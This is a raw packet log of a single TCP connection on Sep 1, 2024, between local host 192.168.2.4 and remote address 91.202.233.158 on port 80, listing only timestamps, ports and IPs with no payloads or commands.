Sep 1, 2024 18:28:14.346894026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346904039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346915007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346921921 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.346925020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346935034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346946955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346951962 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.346956968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346967936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346977949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346980095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.347001076 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.347007036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.347013950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.347055912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.347672939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.347682953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.347692013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.347713947 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.347733974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.388899088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.389034986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.389045954 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.389075994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.389204979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.389216900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.389225960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.389236927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.389246941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.389252901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.389257908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.389292002 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.389309883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.390571117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390614033 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.390765905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390778065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390786886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390798092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390805960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.390809059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390820026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390827894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390829086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.390836954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390847921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390856981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390861988 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.390867949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.390886068 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.390902042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.391704082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.391750097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.391906977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.391917944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.391927958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.391938925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.391947985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.391948938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.391957045 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.391968966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.391969919 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.391980886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.391992092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392003059 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.392020941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.392030001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392033100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.392040968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392050982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392075062 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.392097950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.392205954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392216921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392225027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392236948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392246962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392249107 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.392256021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.392266989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.392292976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.431360960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431370020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431375980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431497097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431508064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431519032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431519032 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.431539059 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.431574106 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.431678057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431689024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431698084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431708097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431718111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431725025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.431746006 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.431760073 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.431802034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431813002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431859016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.431986094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.431996107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432005882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432015896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432027102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432069063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432156086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432167053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432178974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432189941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432194948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432199955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432235003 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432265997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432419062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432429075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432446003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432456970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432466984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432468891 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432476997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432502985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432523966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432720900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432732105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432743073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432753086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432764053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432764053 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432775974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432781935 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432787895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432797909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432822943 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432832003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432840109 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432842016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432853937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432863951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432874918 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432883978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432888985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432899952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432907104 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432909966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432933092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432950974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.432957888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432972908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432984114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.432995081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433006048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433010101 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433017015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433027029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433029890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433038950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433048964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433057070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433087111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433235884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433247089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433276892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433295965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433307886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433317900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433329105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433336020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433340073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433370113 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433398962 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433561087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433572054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433584929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433595896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433607101 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433609009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433618069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433629990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433639050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433660984 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433680058 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433829069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433840036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433850050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433860064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433870077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433872938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433900118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433902025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433912039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433917999 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433921099 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433932066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433943033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433947086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433954000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.433974981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.433989048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480093002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480110884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480122089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480132103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480144024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480154037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480166912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480168104 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480178118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480211973 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480231047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480237961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480273008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480298996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480310917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480321884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480333090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480341911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480348110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480366945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480387926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480549097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480560064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480593920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480595112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480607033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480616093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480628014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480640888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480657101 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480720997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480761051 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480791092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480801105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480811119 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480823994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480835915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480865002 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.480981112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.480992079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.481000900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.481014013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.481024027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.481024981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.481036901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.481036901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.481071949 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.481087923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.481324911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.481337070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.481345892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.481357098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.481364965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.481380939 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.481409073 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518090963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518140078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518146038 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518151045 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518182039 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518203974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518229961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518240929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518250942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518261909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518270969 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518297911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518332958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518372059 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518394947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518435955 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518454075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518465996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518475056 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518486977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518496990 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518496990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518524885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518539906 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518666983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518677950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518711090 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518713951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518724918 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518754959 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518779993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518853903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518865108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518873930 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518883944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518889904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518896103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.518897057 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518923998 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.518949032 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519057035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519068956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519078970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519090891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519098997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519117117 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519141912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519200087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519212008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519222021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519232988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519237995 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519253969 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519274950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519356966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519367933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519378901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519391060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519397974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519412994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519438982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519577026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519587994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519598007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519608974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519617081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519618988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519630909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519639015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519640923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519663095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519678116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519697905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519742012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519773960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519784927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519795895 CEST	80	56177	91.202.233.158	192.168.2.4
